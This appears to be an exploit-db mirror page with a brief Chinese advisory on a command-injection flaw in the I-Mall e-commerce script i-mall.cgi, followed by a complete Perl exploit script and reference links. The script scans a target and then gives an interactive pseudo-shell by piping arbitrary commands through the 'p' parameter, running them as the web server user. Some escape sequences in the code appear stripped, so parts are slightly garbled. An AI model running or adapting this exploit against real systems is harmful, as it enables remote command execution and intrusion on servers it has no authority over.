https://www.exploit-db.com/exploits/980
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1068

I-MallCommerce是一款基于CGI的在线购物系统。I-MallCommerce包含的i-mall.cgi脚本对用户提交输入缺少充分过滤，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。i-mall.cgi对用户提交给”p”的参数缺少过滤，提交”|”管道符并追加任意SHELL命令，可导致以WEB进程权限执行任意命令。

##############################################
# I-Mall explo
# Spawn bash style Shell with webserver uid
# Greetz z, spax, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use IO::Socket;
my $host;		
my $port;		
my $command;		
my $url;	
my $shiz;		
my @results;		
my $probe;		
my @U;			
$U[1] = "/i-mall/i-mall.cgi?p=|";
&intro;
&scan;
&choose;
&command;
&exit; 
sub intro {
&help;
&host;
&server;
sleep 1;
};
sub host {
print "nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
$shiz = "|";
print "nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	
sub server {
my $X;
print "nnnnnnnnnnnnnnnnnnnnnnnn";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
	$output = $results[$X];
	if (defined $output){
	if ($output =~/apache/){ $webserver = "apache" };
	};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "nnOK";
	};		
};  
sub scan {
my $status = "not_vulnerable";
print "nnnnnnnnnnnnnnnnnnnnnnnn";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) { 
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
			      $status = "vulnerable";
			      };
	};
if ($flag eq "0") { 
}else{
     };
};
if ($status eq "not_vulnerable"){

				};
}; 
sub choose {

my $choice="1";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
}; 
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};  
sub command {
while ($command !~/quit/i) {
print "[$host]$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose }; 
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/s/+/g; 
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};  
sub connect {
my $connection = IO::Socket::INET->new (
				Proto => "tcp",
				PeerAddr => "$host",
				PeerPort => "$port",
				) or die "nSorry UNABLE TO CONNECT To $host On Port $port.n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command$shiz HTTP/1.1rnHost: $hostrnrn";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1rnHost: $hostrnrn";
};

while ( <$connection> ) { 
			@results = <$connection>;
			 };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};  
sub output{
my $display;
if ($probe eq "string") {
			my $X;
			for ($X=0; $X<=10; $X++) {
			$display = $results[$X];
			if (defined $display){print "$display";};
				};
			}else{
			foreach $display (@results){
			    print "$display";
				};
                          };
};  
sub exit{
print "nnn ORP";
exit;
};
sub help {
print "nnnnnnnnnnnnnnnnnnnnnnnn";
print "n
        I-Mall E-Commerce Software i-mall.cgi 
        Command Execution Vulnerability by SPABAM 2004" ;
print "n http://www.zone-h.org/advisories/read/id=4904
";
print "n I-Mall Exploit v0.99beta18";
print "n n note.. web directory is normally /var/www/html";
print "n";
print "n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "n Command: SCAN URL HELP QUIT";
print "nnnnnnnnnnn";
};

# milw0rm.com [2005-05-04]

来源:XF
名称:imall-commerce-command-execution(16540)
链接:http://xforce.iss.net/xforce/xfdb/16540
来源:www.zone-h.org
链接:http://www.zone-h.org/advisories/read/id=4904
来源:BID
名称:10626
链接:http://www.securityfocus.com/bid/10626
来源:www.securiteam.com
链接:http://www.securiteam.com/exploits/5UP0715FPC.html
来源:OSVDB
名称:7461
链接:http://www.osvdb.org/7461
来源:SECUNIA
名称:11972
链接:http://secunia.com/advisories/11972
来源：NSFOCUS
名称：6658
链接：http://www.nsfocus.net/vulndb/6658